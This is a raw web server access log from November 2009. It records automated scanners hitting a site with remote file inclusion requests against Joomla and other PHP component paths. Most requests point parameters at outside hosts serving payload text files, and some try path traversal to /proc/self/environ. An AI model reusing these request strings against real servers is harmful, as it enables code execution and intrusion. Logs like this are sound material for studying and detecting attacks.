209.92.156.53 - - [30/Nov/2009:03:25:16 -0800] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [30/Nov/2009:03:25:16 -0800] "GET /logs/access_090713.log%20%20/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [30/Nov/2009:03:25:16 -0800] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [30/Nov/2009:03:25:26 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [30/Nov/2009:03:25:26 -0800] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [30/Nov/2009:03:25:26 -0800] "GET /logs/access_090713.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.204 - - [30/Nov/2009:03:26:07 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.futurenetwork.com.br/loja/images/fxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.204 - - [30/Nov/2009:03:26:07 -0800] "GET /logs/access_091019.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://www.futurenetwork.com.br/loja/images/fxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.204 - - [30/Nov/2009:03:26:07 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.futurenetwork.com.br/loja/images/fxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.204 - - [30/Nov/2009:03:26:14 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.futurenetwork.com.br/loja/images/fxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.204 - - [30/Nov/2009:03:26:14 -0800] "GET /logs/access_091019.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://www.futurenetwork.com.br/loja/images/fxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.204 - - [30/Nov/2009:03:26:14 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.futurenetwork.com.br/loja/images/fxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [30/Nov/2009:03:26:15 -0800] "GET /logs/access_090713.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [30/Nov/2009:03:26:15 -0800] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [30/Nov/2009:03:26:15 -0800] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.204 - - [30/Nov/2009:03:26:25 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.futurenetwork.com.br/loja/images/fxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.204 - - [30/Nov/2009:03:26:25 -0800] "GET /logs/access_091019.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://www.futurenetwork.com.br/loja/images/fxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.204 - - [30/Nov/2009:03:26:25 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.futurenetwork.com.br/loja/images/fxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [30/Nov/2009:03:27:12 -0800] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [30/Nov/2009:03:27:12 -0800] "GET /logs/access_091005.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [30/Nov/2009:03:27:12 -0800] "GET /logs/access_090824.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [30/Nov/2009:03:27:13 -0800] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [30/Nov/2009:03:27:13 -0800] "GET /logs/access_090622.log%20%20/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [30/Nov/2009:03:27:15 -0800] "GET /logs/access.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [30/Nov/2009:03:27:28 -0800] "GET /logs/access_090622.log%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [30/Nov/2009:03:27:37 -0800] "GET /logs/access_090622.log%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [30/Nov/2009:03:28:46 -0800] "GET /logs/access_090622.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [30/Nov/2009:03:28:47 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [30/Nov/2009:03:28:47 -0800] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [30/Nov/2009:03:28:47 -0800] "GET /logs/access_090907.log%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.26.26 - - [30/Nov/2009:03:29:04 -0800] "GET /logs/access_091019.log//admin/spaw/spaw_control.class.php?spaw_root=http://mubankaii.no-ip.biz:8090//appserv/sid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [30/Nov/2009:03:29:12 -0800] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [30/Nov/2009:03:29:12 -0800] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [30/Nov/2009:03:29:12 -0800] "GET /logs/access_090713.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [30/Nov/2009:03:29:15 -0800] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [30/Nov/2009:03:29:16 -0800] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [30/Nov/2009:03:29:16 -0800] "GET /logs/access_090713.log%20%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [30/Nov/2009:03:29:25 -0800] "GET /logs/access_090713.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [30/Nov/2009:03:29:25 -0800] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [30/Nov/2009:03:29:25 -0800] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [30/Nov/2009:03:30:04 -0800] "GET /logs/access_090921.log%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [30/Nov/2009:03:30:48 -0800] "GET /logs/access_090622.log%20%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [30/Nov/2009:03:32:21 -0800] "GET /logs/access_090622.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:03:34:18 -0800] "GET /include//skin/zero_vote/setup.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:03:34:18 -0800] "GET /logs/access_090713.log%20%20/include//skin/zero_vote/setup.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:03:34:18 -0800] "GET /logs/include//skin/zero_vote/setup.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:03:37:53 -0800] "GET /logs/include//skin/zero_vote/setup.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
91.192.20.164 - - [30/Nov/2009:03:37:54 -0800] "GET /include//skin/zero_vote/setup.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
91.192.20.164 - - [30/Nov/2009:03:37:58 -0800] "GET /logs/access.log%20%20/include//skin/zero_vote/setup.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.175.26.26 - - [30/Nov/2009:03:40:37 -0800] "GET /logs/access_090720.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://mubankaii.no-ip.biz:8090//appserv/sid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.26.26 - - [30/Nov/2009:03:40:37 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://mubankaii.no-ip.biz:8090//appserv/sid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.26.26 - - [30/Nov/2009:03:40:37 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://mubankaii.no-ip.biz:8090//appserv/sid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.26.26 - - [30/Nov/2009:03:41:17 -0800] "GET /logs/access.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://mubankaii.no-ip.biz:8090//appserv/sid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.26.26 - - [30/Nov/2009:03:41:37 -0800] "GET /logs/access_090622.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://mubankaii.no-ip.biz:8090//appserv/sid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.204 - - [30/Nov/2009:03:42:23 -0800] "GET /logs/access_091005.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.futurenetwork.com.br/loja/images/fxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.204 - - [30/Nov/2009:03:42:27 -0800] "GET /logs/access_091005.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.futurenetwork.com.br/loja/images/fxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.91.3 - - [30/Nov/2009:03:42:31 -0800] "GET /logs/index.php?redir=http://www.koolee.com/cmdstate.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.galf.org"
77.92.91.3 - - [30/Nov/2009:03:42:31 -0800] "GET /index.php?redir=http://www.koolee.com/cmdstate.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.galf.org"
77.92.91.3 - - [30/Nov/2009:03:42:31 -0800] "GET /logs/index.php?redir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.galf.org"
77.92.91.3 - - [30/Nov/2009:03:42:32 -0800] "GET /index.php?redir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.galf.org"
77.92.91.3 - - [30/Nov/2009:03:42:32 -0800] "GET /logs/index.php?redir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.galf.org"
77.92.91.3 - - [30/Nov/2009:03:42:32 -0800] "GET /index.php?redir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.galf.org"
77.92.91.3 - - [30/Nov/2009:03:42:32 -0800] "GET /logs/errors.php?error=http://www.koolee.com/cmdstate.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.galf.org"
77.92.91.3 - - [30/Nov/2009:03:42:32 -0800] "GET /errors.php?error=http://www.koolee.com/cmdstate.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.galf.org"
69.175.26.26 - - [30/Nov/2009:03:42:36 -0800] "GET /logs/access_090720.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://mubankaii.no-ip.biz:8090//appserv/sid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.204 - - [30/Nov/2009:03:42:48 -0800] "GET /logs/access_091005.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.futurenetwork.com.br/loja/images/fxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.71.237.150 - - [30/Nov/2009:03:42:51 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://woorizip1004.net/zboard/data/album2/1239110194/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.71.237.150 - - [30/Nov/2009:03:42:51 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://woorizip1004.net/zboard/data/album2/1239110194/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.71.237.150 - - [30/Nov/2009:03:42:51 -0800] "GET /logs/access_090713.log/components/com_performs/performs.php?mosConfig_absolute_path=http://woorizip1004.net/zboard/data/album2/1239110194/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.26.26 - - [30/Nov/2009:03:43:00 -0800] "GET /logs/access_091116.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://mubankaii.no-ip.biz:8090//appserv/sid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.204 - - [30/Nov/2009:03:44:20 -0800] "GET /logs/access_091019.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.futurenetwork.com.br/loja/images/fxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.204 - - [30/Nov/2009:03:44:27 -0800] "GET /logs/access_091019.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.futurenetwork.com.br/loja/images/fxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.204 - - [30/Nov/2009:03:45:32 -0800] "GET /logs/access_091019.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.futurenetwork.com.br/loja/images/fxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:03:45:53 -0800] "GET /logs/access_090713.log/include//skin/zero_vote/setup.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.23.238.192 - - [30/Nov/2009:03:46:25 -0800] "GET /logs/scripts.log HTTP/1.0" 200 1782131 "http://www.galf.org/logs/scripts.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)" "www.galf.org"
67.19.66.10 - - [30/Nov/2009:03:48:17 -0800] "GET /logs/access_091019.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.66.10 - - [30/Nov/2009:03:48:20 -0800] "GET /logs/access_091012.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:03:48:49 -0800] "GET /logs/access.log/include//skin/zero_vote/setup.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.22.119.110 - - [30/Nov/2009:03:49:46 -0800] "GET /logs//include/prodler.class.php?sPath=http://kelapa.fileave.com/a.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.22.119.110 - - [30/Nov/2009:03:49:46 -0800] "GET /logs/access_090928.log//include/prodler.class.php?sPath=http://kelapa.fileave.com/a.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.22.119.110 - - [30/Nov/2009:03:49:46 -0800] "GET /include/prodler.class.php?sPath=http://kelapa.fileave.com/a.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.201.82.173 - - [30/Nov/2009:03:50:19 -0800] "GET /logs//inc/cmses/aedating4CMS.php?dir[inc]=http://www.qatarsteel.com.qa/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
122.201.82.173 - - [30/Nov/2009:03:50:19 -0800] "GET /logs/access.log%20%20//inc/cmses/aedating4CMS.php?dir[inc]=http://www.qatarsteel.com.qa/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
122.201.82.173 - - [30/Nov/2009:03:50:19 -0800] "GET /inc/cmses/aedating4CMS.php?dir[inc]=http://www.qatarsteel.com.qa/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
122.201.82.173 - - [30/Nov/2009:03:50:21 -0800] "GET /inc/cmses/aedating4CMS.php?dir[inc]=http://www.qatarsteel.com.qa/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
122.201.82.173 - - [30/Nov/2009:03:50:21 -0800] "GET /logs/access.log%20%20//inc/cmses/aedating4CMS.php?dir[inc]=http://www.qatarsteel.com.qa/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
122.201.82.173 - - [30/Nov/2009:03:50:21 -0800] "GET /logs//inc/cmses/aedating4CMS.php?dir[inc]=http://www.qatarsteel.com.qa/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
77.92.91.3 - - [30/Nov/2009:03:51:18 -0800] "GET /logs/access_091116.log/index.php?redir=http://www.koolee.com/cmdstate.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.galf.org"
77.92.91.3 - - [30/Nov/2009:03:51:18 -0800] "GET /logs/access_091116.log/index.php?redir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.galf.org"
77.92.91.3 - - [30/Nov/2009:03:51:19 -0800] "GET /logs/access_091116.log/index.php?redir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.galf.org"
77.92.91.3 - - [30/Nov/2009:03:51:19 -0800] "GET /logs/access_091116.log/errors.php?error=http://www.koolee.com/cmdstate.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.galf.org"
64.22.119.110 - - [30/Nov/2009:03:51:32 -0800] "GET /logs/access_090928.log//include/prodler.class.php?sPath=http://kelapa.fileave.com/a.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.22.119.110 - - [30/Nov/2009:03:51:33 -0800] "GET /logs//include/prodler.class.php?sPath=http://kelapa.fileave.com/a.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.22.119.110 - - [30/Nov/2009:03:51:33 -0800] "GET /include/prodler.class.php?sPath=http://kelapa.fileave.com/a.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:03:52:54 -0800] "GET /logs/access_090810.log//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.91.3 - - [30/Nov/2009:03:52:55 -0800] "GET /logs/access_090720.log/index.php?redir=http://www.koolee.com/cmdstate.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.galf.org"
77.92.91.3 - - [30/Nov/2009:03:52:56 -0800] "GET /logs/access_090720.log/index.php?redir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.galf.org"
77.92.91.3 - - [30/Nov/2009:03:52:56 -0800] "GET /logs/access_090720.log/index.php?redir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.galf.org"
77.92.91.3 - - [30/Nov/2009:03:52:57 -0800] "GET /logs/access_090720.log/errors.php?error=http://www.koolee.com/cmdstate.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.galf.org"
122.201.82.173 - - [30/Nov/2009:03:52:58 -0800] "GET /logs/access_090622.log//inc/cmses/aedating4CMS.php?dir[inc]=http://www.qatarsteel.com.qa/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.201.82.173 - - [30/Nov/2009:03:52:58 -0800] "GET /inc/cmses/aedating4CMS.php?dir[inc]=http://www.qatarsteel.com.qa/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.201.82.173 - - [30/Nov/2009:03:52:59 -0800] "GET /logs//inc/cmses/aedating4CMS.php?dir[inc]=http://www.qatarsteel.com.qa/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.201.82.173 - - [30/Nov/2009:03:53:13 -0800] "GET /logs//inc/cmses/aedating4CMS.php?dir[inc]=http://www.qatarsteel.com.qa/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.201.82.173 - - [30/Nov/2009:03:53:13 -0800] "GET /logs/access_090622.log//inc/cmses/aedating4CMS.php?dir[inc]=http://www.qatarsteel.com.qa/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.201.82.173 - - [30/Nov/2009:03:53:13 -0800] "GET /inc/cmses/aedating4CMS.php?dir[inc]=http://www.qatarsteel.com.qa/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.233.89.196 - - [30/Nov/2009:03:53:43 -0800] "GET /logs/access_090601.log%20%20//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://aop.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.233.89.196 - - [30/Nov/2009:03:53:43 -0800] "GET /logs//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://aop.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.233.89.196 - - [30/Nov/2009:03:53:44 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://aop.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
